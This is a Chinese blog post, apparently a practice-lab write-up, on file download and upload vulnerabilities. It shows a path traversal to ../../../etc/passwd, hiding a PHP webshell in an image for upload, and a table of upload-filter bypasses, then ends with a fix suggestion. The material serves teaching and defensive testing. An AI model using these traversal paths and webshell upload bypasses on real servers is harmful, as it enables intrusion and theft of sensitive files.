文件下载与上传漏洞

最新推荐文章于 2024-09-16 14:00:00 发布
最新推荐文章于 2024-09-16 14:00:00 发布
阅读量384 收藏
点赞数
文章标签: php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feiniaotjx/article/details/120415306
版权

文件下载漏洞与文件上传漏洞

文件下载漏洞

概述

文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。 如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全的文件下载漏洞。
此时如果 攻击者提交的不是一个程序预期的的文件名,而是一个精心构造的路径(比如…/…/…/etc/passwd),则很有可能会直接将该指定的文件下载下来。 从而导致后台敏感信息(密码文件、源代码等)被下载。
所以,在设计文件下载功能时,如果下载的目标文件是由前端传进来的,则一定要对传进来的文件进行安全考虑

测试

存在图片地址和图片下载的链接地址 ,
图片地址:https://www.bihuoedu.com/vul/unsafedownload/download/kb.png
图片下载的链接地址:https://www.bihuoedu.com/vul/unsafedownload/execdownload.php?filename=kb.png
因为execdownload.php在unsafedownload目录下,此图片下载地址为unsafedownload目录的下一级,故下载execdownload.php时要返回上一级,再下载,为../execdownload.php在这里插入图片描述

下载文件,就可以查看execdownload.php的内容了在这里插入图片描述
在这里插入图片描述

文件上传漏洞

概述

文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后,后台会对上传的文件进行判断 比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式进行重命名后存储在指定的目录。 如果说后台对上传的文件没有进行任何的安全判断或者判断条件不够严谨,则攻击着可能会上传一些恶意的文件,比如一句话木马,从而导致后台服务器被webshell。
所以,在设计文件上传功能时,一定要对传进来的文件进行严格的安全考虑。比如:
–验证文件类型、后缀名、大小;
–验证文件的上传方式;
–对文件进行一定复杂的重命名;
–不要暴露文件上传后的路径;
–等等…

Content-Type限制(内容类型
一般是指网页中存在的 Content-Type,用于定义网络文件的类型和网页的编码,决定浏览器将以什么形式、什么编码读取这个文件,这就是经常看到一些 PHP 网页点击的结果却是下载一个文件或一张图片的原因。Content-Type 标头告诉客户端实际返回的内容的内容类型。

MIME type限制了上传的文件,可将类型改为image/jpeg
在这里插入图片描述上传成功
在这里插入图片描述连接成功
在这里插入图片描述
getimagesize()函数绕过
可上传图片木马,输入copy /b 2.jpg + 1.php 3.jpg合成3.jpg
在这里插入图片描述
上传3.jpg并连接
在这里插入图片描述但没有执行代码,没有解析图片
在这里插入图片描述
所以可以借助文件包含执行图片代码(借助文件包含的url)
https://www.bihuoedu.com/vul/fileinclude/fi_local.php?filename=file1.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2,再将图片地址包含进去

常见绕过方式

类型方式
对后缀的限制可上传php,asp,cer,.htaccess,aspx等 ,在后缀后面可加空格,或截断等
客户端js检测上传文件后缀通过burp抓包更改响应后缀
apache解析顺序从右到左开始解析后缀,若最右侧的扩展名不可识别,则继续向左判断,直到遇到可以解析的文件后缀为止,如1.php.xxx会被解析为1.php
不长见类型后缀可尝试上传一些罕见后缀,如1.phtml
Content-Type限制此值通过客户端传递,可修改为 相应的类型,如图片类型为image/jpeg
getimagesize()可将图片和webshell合成一个图片文件,如cat image.png webshell.php > image.php(linux)
截断绕过php<5.3.4时,magic_quotes_gpc为off状态,00代表结束符,会把后面的所以字符删去。如上传1.php%00.jpg时,%00会把包括.jpg之后的文件名截断,之后就会保存为1.php
条件竞争一些网站上传文件先允任意上传文件,之后再检测,若检查有webshelll脚本,则删除。这里就存在检查和删除之间的时间差,可以利用这个时间差完成条件竞争的上传漏洞攻击(快速上传)

*文件上传修复建议:*通过白名单的方式判断文件后缀是否合法,对上传文件重命名,如rand(1,99).date("YmdHis").".jpg"

F。N 嘿嘿
关注
文件下载漏洞
11-25
文件下载功能存在漏洞,需要对待下载的文件路径进行判断否则可能下载任意文件
pikachu之不安全的文件下载概述
qq_42728977的博客
12-26 1066
不安全的文件下载概述 文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。 如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全的文件下载漏洞。 此时如果 攻击者提交的不...
基础漏洞——任意文件查看与下载漏洞
最新发布
2301_79096184的博客
09-16 468
file_get_contents():直接读取文件内容,输出读取内容。不会在正常页面上显示,会在源码里面显示出来,不被解析,直接呈现出来。readfile():直接读取文件内容,自带输出功能。fread():读取文件,输出文件。代码审计,查找更多可利用的代码。
如何下载被标记为不安全的文件?
weixin_30594001的博客
02-19 245
我们使用 IE 时,可以观察到 Internet Explorer 有一种安全检查机制叫做 SmartScreen,虽然它不是一种安全壁垒,但是可以有效帮助减少来自互联网的欺骗与其他风险。 SmartScreen 筛选器在起初设计时,是为了检查 IE 访问的 URL,如果是钓鱼网站,那么 IE 会提示用户不要继续访问。在 Windows 8 中,SmartScreen 技术已经集成到系统之...
Pikachu靶场——不安全的文件下载(Unsafe Filedownload)
来日可期的博客
10-04 1353
文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。如果后台在收到请求的文件名后,将其直接拼接到下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全的文件下载漏洞
Unsafe Filedownload(不安全的文件下载
Goodric的博客
01-28 655
Unsafe Filedownload(不安全的文件下载文件下载的功能在很多web 系统上都会出现。当我们点击下载链接,就会向后台发送一个请求,一般这个请求会包含下载文件的名称,后台收到请求会开始执行下载代码,将该文件名对应的文件response 给浏览器,从而完成下载。 后台在收到请求的文件名时,将其直接拼接到下载文件的路径中而不对其进行安全判断的话,就会引发不安全的文件下载漏洞。 攻击者可以构造一个路径(如:…/…/…/etc/passwd),浏览器可能会直接将指定的文件下载下来,就会导致后台的敏感
finecms-含有前台文件上传漏洞源码包.zip
01-04
防止文件上传漏洞的关键在于强化上传文件的验证与管理: - **严格限制上传文件类型**:只允许特定的非可执行文件类型(如图片、文档)上传。 - **文件名重命名**:上传后立即对文件名进行随机化或哈希处理,避免...
计算机病毒与防护:文件上传漏洞原理.ppt
06-10
计算机病毒与防护:文件上传漏洞原理 文件上传漏洞网络安全领域中的一个重要问题,尤其是在Web应用程序中,这种漏洞可能导致严重的安全威胁。许多网站提供文件上传功能,例如用户上传头像、社交网络上的照片分享...
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
奇安信代码卫士,文件上传漏洞解决demo
04-23
奇安信代码卫士,文件上传漏洞解决demo; #### 文件上传可以参考以下安全需求进行处理: 1. 服务器配置: (1)将上传目录和上传文件设置为不可执行, 杜绝脚本执行。 (2)应保证服务器安全,避免文件解析漏洞。 2....
计算机网络安全中文件上传漏洞及防御措施.pdf
09-19
计算机网络安全中文件上传漏洞及防御措施 计算机网络安全中文件上传漏洞是一种常见的Web安全漏洞,攻击者可以通过上传恶意代码的文件来获取服务器的控制权。为了防御这种攻击,需要对文件上传进行严格的校验检测,...
不安全的文件下载上传
鲨鱼辣椒的博客
05-21 427
unsafe filedownload (不安全的文件下载) 官方简介 一些web网站会提供文件下载服务,一般是点击一个下载链接,会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名,后台在收到请求后会开始执行下载代码,经文件名对应的文件返回到浏览器,从而完成下载。但如果后台在收到请求的文件名后,将其直接拼接进下载文件的路径中而不对其做安全判断的话,则可能会引发不安全的文件下载漏洞 此时如果攻击者提交的不是一个程序预期的文件名,而是一个精心构造的路径(../../../etc/passwd
六、pikachu 不安全的文件下载
山兔的博客
09-17 255
1.不安全的文件下载概述 一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。 如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全的文件下载漏洞。 处理: 在设计文件下载功能时,如果下载的目标文件是由前端传进来的,则一定要对传进来的文件进行安全考虑。 切记:所有与前端交互的数据都是不安全的,不能掉以轻心! 2.不安全的
8-1不安全的文件下载原理和案例演示
山兔的博客
06-10 408
文件的上传和下载,是我们在WEB服务中,常常涉及到的功能,我相信大家都用过,但是如果这种功能设计不当的话,也会导致一些比较严重的安全问题很多网站都会提供文件下载功能,即用户可以通过点击下载链接,这个链接就会产生一个对应的请求,它告诉服务器我们要下载那个目标文件,然后,后台就去读取后台存在的文件,把他的效应输出到前端。 但是,如果文件下载功能设计不当,则可能导致前端攻击者可以通过构造传入的参数,从而获取到后台服务器上的其他的敏感文件。(又称:任意文件下载)我们选择unsafe filedownload项目然后
又一个下载恶意文件的政府网站
Purpleendurer@CSDN
08-22 3319
endurer 原创2006-08-22 第1版 首页有3处地方被加入:/--------<iframe height=0 width=0 src="hxxp://***object.cnic**b.com/15"></iframe>--------/hxxp://***object.cnic**b.com/15   的内容为插入许多空格的JavaScript脚本,利用 Microso
恶意下载文件
m0_62207482的博客
04-03 390
说人话就是,浏览器并不认得这是什么类型,也不知道应该如何展示,只知道这是一种二进制文件,因此遇到content-type为application/octet-stream的文件时,浏览器会直接把它下载下来。意思是未知的应用程序文件,浏览器一般不会自动执行或询问执行。在某些下载文件的场景中,服务端可能会返回文件流,并在返回头中带上Content-Type:application/octet-stream,告知浏览器这是一个字节流,浏览器处理字节流的默认方式就是下载。
不安全的文件下载原理
gl620321的博客
05-09 1279
一.不安全的文件下载上传 1.不安全文件下载漏洞概述 文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。 如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全的文件下...
不安全的文件下载原理和案例演示
北冥有鱼
05-09 442
文件下载漏洞概述 我们来到pikachu 打开 我们可以点击名字去下载这张图片 实际上相当于把ai.png的filename传到了后台,后台就去找这个文件,把这个文件读取之后又响应输出到前端,浏览器就可以把它下载下来了,这样的一个过程,如果后端的代码控制的不够严格,这个地方就会出现漏洞了 比如我们跳到根目录去,去获取passwd 这就是这台服务器上passwd上的文件,直接被我们下...
两个会自动下载恶意程序文件的政府网站
Purpleendurer@CSDN
08-18 4215
endurer 原创2006-08-18 第1版打开这两个网站时,Kaspersky 提示发现 Exploit.JS.ADODB.stream.e。第一个网站 hxxp://www.jing***.gov.cn的首页加入代码:--------<TR><script language=javascript src=bbs.js></script><TD vAlign=top align=
文件上传漏洞详解:安全与对策
"File in the hole - 文件上传漏洞详解与安全防护" 本文档主要探讨的是“File in the hole”——一种文件上传漏洞,该漏洞通常发生在Web应用程序中,允许攻击者通过上传恶意文件来获取对服务器的非法访问权限,甚至...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值